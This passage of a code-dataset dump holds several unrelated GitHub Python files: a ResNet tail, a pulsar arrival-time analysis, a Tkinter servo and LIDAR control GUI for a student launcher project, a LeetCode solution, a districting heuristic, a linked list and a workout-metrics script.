m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(0.5)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.bias.data.zero_()\n m.weight.data.normal_(0, 0.01)\n\n def forward(self, x):\n out = self.conv1(x)\n\n out = self.stage1(out)\n out = self.stage2(out)\n out = self.stage3(out)\n\n out = self.bn(out)\n out = self.select(out)\n out = self.relu(out)\n\n out = self.avgpool(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n\n return out\n\n\ndef resnet164(cfg=None, num_class=100):\n return ResNet(num_class, cfg)\n\n\n# net = resnet164()\n# x = torch.rand(1, 3, 32, 32)\n# y = net(x)\n# print(y.shape)\n# for m in net.stage1[0].modules():\n# print(m)\n# print(net.stage1[0])\n\n","repo_name":"EstherBear/implementation-of-network-slimming","sub_path":"models/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"31517805329","text":"\"\"\"Time of Arrival Analysis.\"\"\"\n\nimport logging\nimport random\nimport warnings\nfrom pathlib import Path\nfrom typing import List\n\nimport numpy as np\nfrom numba import jit\nfrom numba.core.errors import NumbaPendingDeprecationWarning\nfrom tqdm import tqdm\n\nLOG_FORMAT: str = \"[%(asctime)s] %(levelname)s \"\nLOG_FORMAT += \"%(module)s::%(funcName)s():l%(lineno)d: \"\nLOG_FORMAT += \"%(message)s\"\nlogging.basicConfig(format=LOG_FORMAT, level=logging.ERROR)\nlog = logging.getLogger(__name__)\n# Supress deprecation messages\nwarnings.filterwarnings(action=\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(action=\"ignore\", category=NumbaPendingDeprecationWarning)\nwarnings.filterwarnings(action=\"ignore\", category=UserWarning)\n\nFACTORIAL_LOOKUP_TABLE = np.array(\n [\n 1,\n 1,\n 2,\n 6,\n 24,\n 120,\n 720,\n 5040,\n 40320,\n 362880,\n 3628800,\n 39916800,\n 479001600,\n 6227020800,\n 87178291200,\n 1307674368000,\n 20922789888000,\n 355687428096000,\n 6402373705728000,\n 121645100408832000,\n 2432902008176640000,\n ],\n dtype=\"int64\",\n)\n\n\ndef frequency_grid(\n resolution: float = 0.00786432,\n samples: float = 536.0,\n oversample: int = 5,\n) -> np.ndarray:\n \"\"\"\n Generate frequency grid.\n\n Parameters\n ----------\n resolution : float, optional\n [description], by default 0.00786432\n samples : float, optional\n [description], by default 536.0\n oversample : int, optional\n [description], by default 5\n\n Returns\n -------\n np.ndarray\n [description]\n \"\"\"\n spacing = 1.0 / (samples * resolution)\n nyquist = 0.5 * (1.0 / resolution)\n return np.arange(\n spacing,\n nyquist + (spacing / oversample),\n (spacing / oversample),\n )\n\n\n@jit(nopython=True)\ndef parameters(\n arrivals: List[float],\n chi: float,\n simulations: int = int(1e6),\n):\n \"\"\"\n Calculate the parameters for the workload .\n\n Parameters\n ----------\n arrivals : List[float]\n [description]\n chi : float\n [description]\n processors : int\n [description]\n simulations : int, optional\n [description], by default int(1e6)\n\n Returns\n -------\n [type]\n [description]\n \"\"\"\n # Convert\n toas = np.array(arrivals) * 0.001\n # np.empty is ~100x faster than np.zeros\n errors = np.zeros(len(toas)) * 0.001\n differences = np.zeros(len(toas) - 1)\n\n for index in np.arange(0, len(toas) - 1, 1):\n differences[index] = toas[index + 1] - toas[index]\n\n minimum = chi * differences.mean()\n 
maximum = (2.0 - chi) * differences.mean()\n return toas, errors, differences, minimum, maximum\n\n\n@jit(nopython=True)\ndef z2search(toas: np.ndarray, errors: np.ndarray, grid: np.ndarray) -> np.ndarray:\n \"\"\"\n Lightcurve search.\n\n Parameters\n ----------\n toas : np.ndarray\n [description]\n errors : np.ndarray\n [description]\n grid : np.ndarray\n [description]\n\n Returns\n -------\n np.ndarray\n [description]\n \"\"\"\n z1 = np.zeros(grid.size, dtype=np.float64)\n for index in np.arange(0, len(grid), 1):\n phase = pulse_phase(toas, grid[index])\n z1[index] = z_n(phase, n=1)\n return z1\n\n\n@jit(nopython=True)\ndef pulse_phase(times, *frequency_derivatives):\n \"\"\"\n Calculate pulse phase from the frequency and its derivatives.\n\n Parameters\n ----------\n times : array of floats\n The times at which the phase is calculated\n *frequency_derivatives: floats\n List of derivatives in increasing order, starting from zero.\n\n Returns\n -------\n phases : array of floats\n The absolute pulse phase\n \"\"\"\n phase = np.zeros(len(times))\n for i_f, f in enumerate(frequency_derivatives):\n factorial = fast_factorial(i_f + 1)\n phase += 1 / factorial * times ** (i_f + 1) * f\n phase -= np.floor(phase)\n return phase\n\n\n@jit(nopython=True)\ndef fast_factorial(value: np.int64) -> np.int64:\n \"\"\"\n Factorial.\n\n Parameters\n ----------\n value : np.int64\n Some integer value.\n\n Returns\n -------\n np.int64\n\n Raises\n ------\n ValueError\n When value > 20.\n \"\"\"\n if value > 20:\n raise ValueError(\"fast_factorial for n>20, not supported.\")\n return FACTORIAL_LOOKUP_TABLE[value]\n\n\n@jit(nopython=True)\ndef z_n(phase: np.ndarray, n: int = 2, norm: float = 1.0):\n \"\"\"Z^2_n statistics, a` la Buccheri+03, A&A, 128, 245, eq. 2.\n\n Parameters\n ----------\n phase : array of floats\n The phases of the events\n n : int, default 2\n Number of harmonics, including the fundamental\n norm : float or array of floats\n A normalization factor that gets multiplied as a weight.\n\n Returns\n -------\n z2_n : float\n The Z^2_n statistics of the events.\n \"\"\"\n nbin = len(phase)\n if nbin == 0:\n return 0\n normalization = np.array(norm)\n if normalization.size == 1:\n total_norm = nbin * normalization\n else:\n total_norm = np.sum(normalization)\n phase = phase * 2 * np.pi\n return 2.0 / total_norm * statistic(n, phase, normalization)\n\n\n@jit(nopython=True)\ndef statistic(n, phase, norm):\n \"\"\"Calculate Z^2 Statistic.\"\"\"\n stat = np.zeros(n + 1, dtype=np.float64)\n for k in range(1, n + 1):\n stat[k - 1] = (\n np.sum(np.cos(k * phase) * norm) ** 2\n + np.sum(np.sin(k * phase) * norm) ** 2\n )\n return np.sum(stat)\n\n\n@jit(nopython=True)\ndef simulate(simulations: int, differences: np.ndarray, minimum: int, maximum: int):\n \"\"\"\n Generate simulated observations.\n\n Parameters\n ----------\n simulations : int\n [description]\n differences : np.ndarray\n [description]\n minimum : int\n [description]\n maximum : int\n [description]\n\n Returns\n -------\n [type]\n [description]\n \"\"\"\n differences_mc = np.zeros((int(simulations), len(differences)))\n toas_mc = np.zeros((int(simulations), len(differences) + 1))\n errors_mc = np.zeros((int(simulations), len(differences) + 1))\n\n for index in np.arange(0, int(simulations), 1):\n differences_mc[index] = np.random.uniform(minimum, maximum, len(differences))\n\n for index in np.arange(0, len(differences_mc), 1):\n toas_mc[index, 1:] = np.cumsum(differences_mc[index, :])\n\n return differences_mc, toas_mc, errors_mc\n\n\ndef 
save(data: np.ndarray, savepath: Path) -> None:\n \"\"\"\n Save np.ndarray.\n\n Parameters\n ----------\n data : np.ndarray\n savepath : Path\n \"\"\"\n filename = savepath.absolute().as_posix()\n np.savez(filename, max_z12_power=data)\n savepath.chmod(0o100666)\n\n\ndef execute(\n arrivals: List[float],\n chi: float,\n simulations: int,\n savepath: Path,\n debug: bool = False,\n) -> None:\n \"\"\"\n Run the simulation .\n\n Parameters\n ----------\n arrivals : List[float]\n [description]\n chi : float\n [description]\n processors : int\n [description]\n simulations : int\n [description]\n savepath: str\n [description]\n \"\"\"\n if debug:\n log.setLevel(logging.DEBUG)\n log.debug(\"Job Recieved: ✔️\")\n np.random.seed(random.SystemRandom().randint(0, 2147483647))\n log.debug(\"Random Seed : ✔️\")\n grid = frequency_grid()\n log.debug(\"Frequency Grid: ✔️\")\n toas, errors, differences, minimum, maximum = parameters(\n arrivals=arrivals,\n chi=chi,\n simulations=simulations,\n )\n log.debug(\"Parameters: ✔️\")\n differences_mc, toas_mc, errors_mc = simulate(\n simulations, differences, minimum, maximum\n )\n log.debug(\"Dataset: ✔️\")\n max_z12_power = np.zeros(len(toas_mc))\n\n for index in tqdm(\n np.arange(0, len(toas_mc), 1),\n ascii=True,\n desc=\"simulating\",\n leave=True,\n ):\n toa = toas_mc[index]\n error = errors_mc[index]\n z1 = z2search(toa, error, grid)\n max_index = np.argmax(z1)\n max_period = 1.0 / grid[max_index] # noqa: F841\n max_z12_power[index] = z1[max_index]\n log.debug(\"Simulations: ✔️\")\n save(max_z12_power, savepath)\n log.debug(\"Save: ✔️\")\n","repo_name":"CHIMEFRB/subpulse","sub_path":"subpulse/analysis/toa.py","file_name":"toa.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5419705174","text":"# This is version 2 of the Control GUI for my Capstone project.\r\n# It includes a safety system for the fire control, an elevation indicator,\r\n# and the potential for linking to another camera to read the pressure gage.\r\n\r\n# OPERATIONAL NOTES:\r\n# The fire button only enables when all three checkboxes are checked, providing a triple-redundant safety.\r\n# The cinch button only enables after the fire button has been pressed.\r\n# The drag deploy button only enables after the cinch button has been pressed.\r\n\r\n# SPECIAL NOTE: If the fire, cinch, or drag buttons break, add a global definition directly above its first use inside a function.\r\n\r\nfrom __future__ import division # servo\r\nimport Tkinter as tk # GUI\r\nimport cv2 # Pressure Gage\r\nfrom PIL import Image, ImageTk # Pressure Gage\r\nimport time # servo and LIDAR\r\nimport math # servo\r\nimport Adafruit_PCA9685 # servo\r\nimport smbus # LIDAR\r\n\r\n# Some LIDAR initializers\r\nbus=smbus.SMBus(1)\r\naddr=0x62\r\n\r\n##import tkMessageBox as mb # This is just so that there is a dialog box that pops up to confirm the fire.\r\n\r\nroot = tk.Tk() # initialize the window.\r\nroot.geometry('590x420') # Sets the default window size\r\nroot.title(\"Control GUI\")\r\n\r\n# ****************************************************************************\r\n# This section contains the elevation indicator.\r\nelevationLabel = tk.Label(root, text = \"Elevation (deg):\", font = 20)\r\nelevationValue = tk.DoubleVar() # this holds the actual elevation value\r\neleValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the elevation.\r\n\r\ndef getElevation(elevation): # a 
function for changing the elevation value.\r\n elevationValue.set(elevation)\r\n\r\ndef updateEle(root, *args): # called when the elevation value is changed.\r\n eleValOut.config(text = elevationValue.get())\r\n\r\nelevationValue.trace(\"w\", updateEle)\r\n\r\nelevationLabel.grid(row=0, column=0)\r\neleValOut.grid(row=0, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the rotation indicator.\r\nrotationLabel = tk.Label(root, text = \"Rotation (deg):\", font = 20)\r\nrotationValue = tk.DoubleVar() # this holds the actual rotation value\r\nrotValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the rotation.\r\n\r\ndef getRotation(rotation): # a function for changing the rotation value.\r\n rotationValue.set(rotation)\r\n\r\ndef updateRot(root, *args): # called when the rotation value is changed.\r\n rotValOut.config(text = rotationValue.get())\r\n\r\nrotationValue.trace(\"w\", updateRot)\r\n\r\nrotationLabel.grid(row=1, column=0)\r\nrotValOut.grid(row=1, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the range indicator.\r\nrangeLabel = tk.Label(root, text = \"Distance to Target:\", font = 20)\r\nrangeValue = tk.DoubleVar() # this holds the actual range value\r\nranValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the range.\r\n\r\ndef getRange(dist): # a function for changing the range value.\r\n rangeValue.set(dist)\r\n\r\ndef updateRan(root, *args): # called when the range value is changed.\r\n ranValOut.config(text = rangeValue.get())\r\n\r\ndef rangeFind(): # This section is the LIDAR code\r\n t_end = time.time() + 5\r\n while time.time() < t_end:\r\n bus.write_byte_data(0x62,0x00, 0x04) \r\n val_high=bus.read_byte_data(0x62,0x0f) \r\n val_low=bus.read_byte_data(0x62,0x10) \r\n dist_cm=val_high*256+val_low\r\n dist_ft=dist_cm*0.0328084\r\n getRange(dist_ft)\r\n #print `dist_ft` + \" ft \"\r\n time.sleep(0.05)\r\n\r\nrangeValue.trace(\"w\", updateRan)\r\n\r\nuRanButton = tk.Button(root, text='Update Range', command=rangeFind)\r\n\r\nrangeLabel.grid(row=2, column=0)\r\nranValOut.grid(row=2, column=1)\r\nuRanButton.grid(row=2, column=2)\r\n\r\n# ****************************************************************************\r\n# This section contains the video for reading the pressure gage. It is purely optional.\r\n##picW = 320\r\n##picH = 214\r\n##ImageFrame=tk.Frame(root,width=picW,height=picH)\r\n##lmain=tk.Label(ImageFrame)\r\n##gageLabel = tk.Label(root, text = \"Pressure Gage:\", font = 20)\r\n##\r\n##cap=cv2.VideoCapture(0) # sets the camera\r\n##\r\n##def getVideo():\r\n## _,frame = cap.read()\r\n## hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\r\n## hsv = cv2.resize(hsv, (picW, picH), interpolation=cv2.INTER_AREA)\r\n## img=Image.fromarray(hsv)\r\n## imgtk=ImageTk.PhotoImage(image=img)\r\n## lmain.imgtk=imgtk\r\n## lmain.configure(image=imgtk)\r\n## lmain.after(10,getVideo)\r\n## \r\n##getVideo() # This actually uses the camera to capture images. 
You may delete it.\r\n##gageLabel.grid(row=3, column=0)\r\n##ImageFrame.grid(row=3, column=1) # keep these locations the same.\r\n##lmain.grid(row=3, column=1) # keep these locations the same.\r\n\r\n# ****************************************************************************\r\n# This section contains the fire control and safety system.\r\n# these are the variables controlled by the checkboxes.\r\nflag1 = tk.BooleanVar()\r\nflag2 = tk.BooleanVar()\r\nflag3 = tk.BooleanVar()\r\nfireState = tk.BooleanVar(value=False)\r\n\r\ndef fire():\r\n # Insert whatever code we want here. It could just be a print statement.\r\n #mb.showinfo('FIRE', 'BOOM')\r\n print(\"BOOM\")\r\n fireState.set(True)\r\n\r\nfireButton = tk.Button(root, state=tk.DISABLED, text='Fire', command=fire) # sets the fire button to disabled by default.\r\n \r\ndef safetySys(root, *args): # The parameters of this function are automatically generated by the trace call.\r\n if all([flag1.get(), flag2.get(), flag3.get()]): # If all 3 checkboxes are checked, enable the fire button.\r\n fireButton.config(state=tk.NORMAL)\r\n else: # If not, disable the fire button for safety.\r\n fireButton.config(state=tk.DISABLED)\r\n\r\n# The locations of the safety boxes and fire button \r\ntk.Checkbutton(root, variable=flag1).grid(row=4, column=0)\r\ntk.Checkbutton(root, variable=flag2).grid(row=4, column=1)\r\ntk.Checkbutton(root, variable=flag3).grid(row=4, column=2)\r\nfireButton.grid(row=5, column=1)\r\n\r\n# These lines watch for a change in the variables controlled by the checkboxes.\r\nflag1.trace(\"w\", safetySys)\r\nflag2.trace(\"w\", safetySys)\r\nflag3.trace(\"w\", safetySys)\r\n\r\n# ****************************************************************************\r\n# This section contains the cinch control\r\ncinchState = tk.BooleanVar(value=False)\r\ndef cinch():\r\n # Insert whatever code we want/need here.\r\n #mb.showinfo('CINCH', 'WHIRRRRRRRR')\r\n print(\"WHIRRRRRRRRR\")\r\n fireState.set(False)\r\n cinchState.set(True)\r\n\r\ncinchButton = tk.Button(root, state=tk.DISABLED, text='Cinch', command=cinch) # sets the cinch button to disabled by default\r\n\r\ndef enableCinch(root, *args): # if the fire button has been pressed, enable the cinch button.\r\n if fireState.get():\r\n cinchButton.config(state=tk.NORMAL) # enables the cinch button.\r\n else:\r\n cinchButton.config(state=tk.DISABLED)\r\n\r\nfireState.trace(\"w\", enableCinch) # when the fireState variable changes, check if you should enable the cinch button.\r\n\r\ncinchButton.grid(row=6, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the drag device control\r\ndef dragDeploy():\r\n # Insert whatever code we want/need here.\r\n #mb.showinfo('Deploy Confirm', 'Junk Deorbiting')\r\n print(\"Junk Deorbiting\")\r\n\r\ndragButton = tk.Button(root, state=tk.DISABLED, text='Drag Device', command=dragDeploy) # sets the drag button to disabled by default\r\n\r\ndef enableDrag(root, *args): # if the cinch button has been pressed, enable the drag device button\r\n dragButton.config(state=tk.NORMAL) # enables the drag button.\r\n\r\ncinchState.trace(\"w\", enableDrag) # when the cinchState variable changes, check if you should enable the drag button.\r\n\r\ndragButton.grid(row=7, column=1)\r\n\r\n# ****************************************************************************\r\n### debug window. 
Manually change elevation and rotation.\r\n##dew = tk.Toplevel() # define an entirely seperate window for the entries\r\n##dew.geometry('320x75')\r\n##dew.title(\"Debug Window\")\r\n##deELab = tk.Label(dew, text = \"Enter Elevation:\", font = 20) # the labels\r\n##deRLab = tk.Label(dew, text = \"Enter Rotation:\", font = 20)\r\n##deRgLab = tk.Label(dew, text = \"Enter Range:\", font = 20)\r\n##\r\n##elevationEntry = tk.Entry(dew) # the entry fields\r\n##rotationEntry = tk.Entry(dew)\r\n##rangeEntry = tk.Entry(dew)\r\n##\r\n##def passEle(event):\r\n## getElevation(elevationEntry.get()) # get the value in the field and pass it to the get function.\r\n##\r\n##def passRot(event):\r\n## getRotation(rotationEntry.get()) # get the value in the field and pass it to the get function.\r\n## \r\n##def passRan(event):\r\n## getRange(rangeEntry.get()) # get the value in the field and pass it to the get function.\r\n##\r\n##elevationEntry.bind(\"\", passEle) # get the number in the entry field when enter is pressed.\r\n##rotationEntry.bind(\"\", passRot) # get the number in the entry field when enter is pressed.\r\n##rangeEntry.bind(\"\", passRan)\r\n##\r\n##deELab.grid(row=0, column=0)\r\n##elevationEntry.grid(row=0, column=1)\r\n##deRLab.grid(row=1, column=0)\r\n##rotationEntry.grid(row=1, column=1)\r\n##deRgLab.grid(row=2, column=0)\r\n##rangeEntry.grid(row=2, column=1)\r\n\r\n# ****************************************************************************\r\n# This section is for the motor motion.\r\npwm = Adafruit_PCA9685.PCA9685()\r\n\r\nminMotionX = 380 # The maximum servo motion left and right (pan)\r\nminMotionY = 150\r\nmaxMotionX = 470 # The maximum servo motion left and right (pan)\r\nmaxMotionY = 670 # The maximum servo motion up and down (tilt)\r\nmoveDis = 1 # Tells the key presses how far to move each time\r\n\r\ntiltSet = 530 # Sets start and end position of motor\r\npanSet = 413 # Sets start and end position of motor # 410\r\n\r\ncurX = panSet # Holds the current x position\r\ncurY = tiltSet # Holds the current y position # 400\r\n\r\npwm.set_pwm_freq(60) # Set frequency to 60hz, good for servos.\r\npwm.set_pwm(14, 14, panSet) # Set X starting position\r\npwm.set_pwm(15, 15, tiltSet) # Set Y starting position # 387\r\nprint('Initializing servos on channel 0 and 1, \"X\" GUI window to quit...')\r\nprint('If cv2 color doesnt run: close the program, give it 5 seconds, then try again')\r\n\r\n# ------------------------------\r\n# Servo functions\r\ndef updatePos():\r\n \r\n pwm.set_pwm(15, 15, curY)\r\n\r\n # These Lines Translate curX,curY into reference (X,Y) coordinates for user\r\n coordX = curX-panSet\r\n coordY = -(curY-tiltSet) # Sign is flipped because Torxis motors read PWM backwards from mini servos\r\n## print(coordX,coordY) # Print current X,Y servo positions\r\n # These Lines output an angle from linear fit calibration based on known angles and PWM signals (coordY) \r\n pitchAngle = -.000003*coordY*coordY*coordY + .0016*coordY*coordY + .2399*coordY + .1111\r\n panAngle = .000002*coordX*coordX*coordX*coordX + .0001*coordX*coordX*coordX - .0041*coordX*coordX + 1.1562*coordX - 1.6779\r\n getElevation(pitchAngle)\r\n getRotation(panAngle)\r\n## print(panAngle,'Pan Degrees') # Diplays servo pan angle from zero\r\n## print(pitchAngle,'Tilt Degrees') # Displays servo pitch angle from local horizontal\r\n## print(' ') # To indent different displayed values per servo position\r\n \r\n pwm.set_pwm(14, 14, curX)\r\n return\r\n\r\ndef keyMotionUp(event):\r\n #print(\"Key Down\")\r\n global 
curY\r\n moveDis = 1\r\n curY -= moveDis\r\n if curY > maxMotionY: # The \"-21\" here is to keep the x on the screen. This may be deleted for the actual motors\r\n curY = maxMotionY\r\n updatePos()\r\n return\r\n\r\ndef keyMotionDown(event):\r\n #print(\"Key Up\")\r\n global curY\r\n moveDis = 1\r\n curY += moveDis\r\n if curY < minMotionY:\r\n curY = minMotionY\r\n updatePos()\r\n return\r\n\r\ndef keyMotionLeft(event):\r\n #print(\"Key Left\")\r\n global curX\r\n moveDis = 1\r\n curX -= moveDis\r\n if curX < minMotionX:\r\n curX = minMotionX\r\n updatePos()\r\n return\r\n\r\ndef keyMotionRight(event):\r\n #print(\"Key Right\")\r\n global curX\r\n moveDis = 1\r\n curX += moveDis\r\n if curX > maxMotionX - 12: # The \"-12\" here is to keep the x on the screen. This may be deleted for the actual motors\r\n curX = maxMotionX - 12\r\n updatePos()\r\n return\r\n# ---------------Fast Key Options-----------------\r\ndef keyMotionFastUp(event):\r\n #print(\"Key Down\")\r\n global curY\r\n moveDis = 5\r\n curY -= moveDis\r\n if curY > maxMotionY - 21:\r\n curY = maxMotionY - 21\r\n updatePos()\r\n return\r\n\r\ndef keyMotionFastDown(event):\r\n #print(\"Key Up\")\r\n global curY\r\n moveDis = 5\r\n curY += moveDis\r\n if curY < minMotionY:\r\n curY = minMotionY\r\n updatePos()\r\n return\r\n\r\ndef keyMotionFastLeft(event):\r\n #print(\"Key Left\")\r\n global curX\r\n moveDis = 5\r\n curX -= moveDis\r\n if curX < minMotionX:\r\n curX = minMotionX\r\n updatePos()\r\n return\r\n\r\ndef keyMotionFastRight(event):\r\n #print(\"Key Right\")\r\n global curX\r\n moveDis = 5\r\n curX += moveDis\r\n if curX > maxMotionX - 12: \r\n curX = maxMotionX - 12\r\n updatePos()\r\n return\r\n#------------------------------------\r\n\r\n# End of servo functions\r\n# -------------------------------------------\r\n# The other bits: a bind and the prints.\r\nroot.bind('', keyMotionUp) # These functions detect a directional keypress,\r\nroot.bind('', keyMotionDown) # then call the function that is the second argument.\r\nroot.bind('', keyMotionLeft)\r\nroot.bind('', keyMotionRight)\r\nroot.bind('',keyMotionFastUp)\r\nroot.bind('',keyMotionFastDown)\r\nroot.bind('',keyMotionFastLeft)\r\nroot.bind('',keyMotionFastRight)\r\n\r\n# ****************************************************************************\r\nroot.mainloop() # Displays the GUI until the close button is pressed.\r\n#cap.release() # shuts down the camera when the program is closed.\r\n\r\npwm.set_pwm(14, 14, panSet) # Set X ending position\r\npwm.set_pwm(15, 15, tiltSet) # Set Y ending position\r\n","repo_name":"armaged835/Motion-Tracker-and-Launcher","sub_path":"Control GUI V3.py","file_name":"Control GUI V3.py","file_ext":"py","file_size_in_byte":14111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42657044129","text":"class Solution(object):\n def maxEnvelopes(self, envelopes):\n \"\"\"\n :type envelopes: List[List[int]]\n :rtype: int\n \"\"\"\n if len(envelopes) == 0:\n return 0\n dp = []\n envelopes.sort(key=lambda x: (x[0], -x[1]))\n for i in range(len(envelopes)):\n l, r = 0, len(dp)\n while l < r:\n mid = (l + r) / 2\n if dp[mid] < envelopes[i][1]:\n l = mid + 1\n else:\n r = mid\n if r >= len(dp):\n dp.append(envelopes[i][1])\n else:\n dp[r] = envelopes[i][1]\n return 
len(dp)","repo_name":"maruichen2004/LeetCode","sub_path":"Russian_Doll_Envelopes.py","file_name":"Russian_Doll_Envelopes.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71111665052","text":"import pathlib\nimport os\n\nfrom constructive.constructive_heuristic import assign_districts\nfrom utilities import read_instance, distance_matrix, MapVisualiser\nfrom solution import Solution\nfrom taboo_search.search_manager import run_search\n\nif __name__ == \"__main__\":\n relative_path = pathlib.Path(__file__).parent.absolute()\n clients = read_instance(os.path.join(relative_path, 'instances', 'instance_small.txt'))\n distance_matrix = distance_matrix(clients)\n K = 6\n g = 150\n b = 3\n rnd_seed = 0\n \n districts = assign_districts(clients, K, distance_matrix, g, b, rnd_seed) \n for district in districts:\n district.best_ever_average_distance = district.value\n \n print(\"solucion constructivo %s\" %(districts[-1].value - districts[0].value))\n iterClientes = 5\n iterSwap = 25\n districts, best_OF_ever = run_search(districts,distance_matrix, 50, iterClientes, iterSwap)\n districts.sort(key=lambda di: di.value)\n solution = Solution(districts)\n mp_v = MapVisualiser()\n mp_v.draw_cluster(solution)\n print(\"solucion TS clientes %s, swap %s, FO %s\" %(iterClientes, iterSwap, solution.OF))","repo_name":"camilovelez/claseMetaheuristica","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25226301518","text":"class Node:\n def __init__(self,value):\n self.value = value\n self.next = None\n self.prev = None\n \n \nclass DoublyLinkedList:\n def __init__(self, value):\n new_node = Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n \n \n def print_DLL(self):\n temp = self.head\n while(temp):\n print(temp.value)\n temp = temp.next\n \n \n def append(self, *value):\n for value in value:\n new_node = Node(value)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n self.length += 1\n return True\n new_node.prev = self.tail\n self.tail.next = new_node\n self.tail = new_node\n self.length += 1\n return True\n \n \n def pop(self):\n if self.length == 0:\n return None\n temp = self.tail\n if self.length == 1:\n self.head = None\n self.tail = None\n self.length -=1\n return temp.value\n self.tail.prev.next = None\n self.tail.prev = None\n self.tail = temp\n self.length -= 1\n return temp.value\n \n \n def prepend(self,value):\n if self.length == 0:\n return self.append(value)\n new_node = Node(value)\n new_node.next = self.head\n self.head.prev = new_node\n self.head = new_node\n self.length += 1\n return True\n \n def popfirst(self):\n if self.length <= 1:\n return self.pop()\n temp = self.head\n self.head = temp.next\n self.head.prev = None\n temp.next = None \n self.length -= 1\n return temp\n \n \n def get(self, index):\n if index <0 or index >= self.length:\n return None\n if index < self.length/2:\n temp = self.head\n for _ in range(index):\n temp = temp.next\n return temp\n temp = self.tail\n for _ in range(self.length-1, index, -1):\n temp = temp.prev\n return temp\n\n \n def set(self, index, value):\n temp = self.get(index)\n if (temp):\n temp.value = value\n return True\n else:\n return False\n \n def insert(self, index, value):\n if index < 0 or index > self.length:\n return False\n elif index == 0:\n return 
self.prepend(value)\n elif index == self.length:\n return self.append(value)\n else:\n new_node = Node(value)\n temp = self.get(index - 1)\n new_node.next = temp.next\n new_node.prev = temp \n temp.next.prev = new_node\n temp.next = new_node\n self.length += 1\n return True\n \n def remove(self, index):\n if index < 0 or index >= self.length:\n return None\n if index == 0:\n return self.popfirst()\n if index == self.length-1:\n return self.pop()\n if self.length == 1:\n return self.pop()\n temp = self.get(index)\n temp.prev.next = temp.next\n temp.next.prev = temp.prev \n temp.next = None\n temp.prev = None\n self.length -= 1\n return temp\n \nx = DoublyLinkedList(1)\n#x.append(2,3,4,5,6,7,8,9)\n#x.prepend(0)\n\n#x.print_DLL()\nx.insert(7,100)\nprint(\"#########################\")\nx.remove(0)\n#print(x.get(7).value)\n\nprint(\"#########################\")\nprint(\"head = {}, tail = {}, length = {}\".format(x.head.value if x.head else x.head, x.tail.value if x.tail else x.tail, x.length))\nx.print_DLL()","repo_name":"tk8320/DataStructures","sub_path":"DoublyLinkedList.py","file_name":"DoublyLinkedList.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33998821921","text":"from base45reflex.SQLModels import Exercise, User, UserProgramHistory, Workout, WorkoutSet, UserWorkoutMetrics\nimport pandas as pd\nfrom sqlmodel import Session, create_engine, select\nfrom rxconfig import ENVIRONMENT\n\n\ndef calculate_metrics(user: User, session: Session):\n program_history_statement = UserProgramHistory.select.filter(UserProgramHistory.user_id == user.id)\n program_history = session.scalars(program_history_statement).all()\n for program in program_history:\n workout_statement = (Workout.select.filter(Workout.user_id == user.id)\n .filter(Workout.date <= program.end_date)\n .filter(Workout.date >= program.start_date))\n workout_list = session.scalars(workout_statement).all()\n if not workout_list:\n continue\n for workout in workout_list:\n set_statement = select(WorkoutSet, Exercise).join(Exercise).where(WorkoutSet.workout_id == workout.id)\n set_list = sess.exec(set_statement).all()\n for ex_set in set_list:\n temp_set = ex_set[0]\n exercise = ex_set[1]\n load_value = temp_set.weight * temp_set.num_sets\n load = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, metric='TotalLoad', date=workout.date,\n exercise=exercise.name, value=load_value, unit_id=temp_set.unit_id)\n avg_rpe = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, value=temp_set.avg_rpe,\n date=workout.date, exercise=exercise.name, metric='AvgRPE')\n avg_reps = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, metric='AvgRepsPerSet',\n date=workout.date, exercise=exercise.name,\n value=temp_set.reps/temp_set.num_sets)\n sess.add(load)\n sess.add(avg_rpe)\n sess.add(avg_reps)\n sess.commit()\n\n\nif __name__ == \"__main__\":\n if ENVIRONMENT == \"DEV\":\n db_url = \"sqlite:///reflex_dev.db\"\n else:\n db_url = \"sqlite:///reflex.db\"\n\n engine = create_engine(db_url)\n\n with Session(engine) as sess:\n user_list = sess.scalars(User.select.filter()).all()\n\n for user in user_list:\n calculate_metrics(user, sess)\n","repo_name":"raven-black-dream/base45reflex","sub_path":"calculate_metrics.py","file_name":"calculate_metrics.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
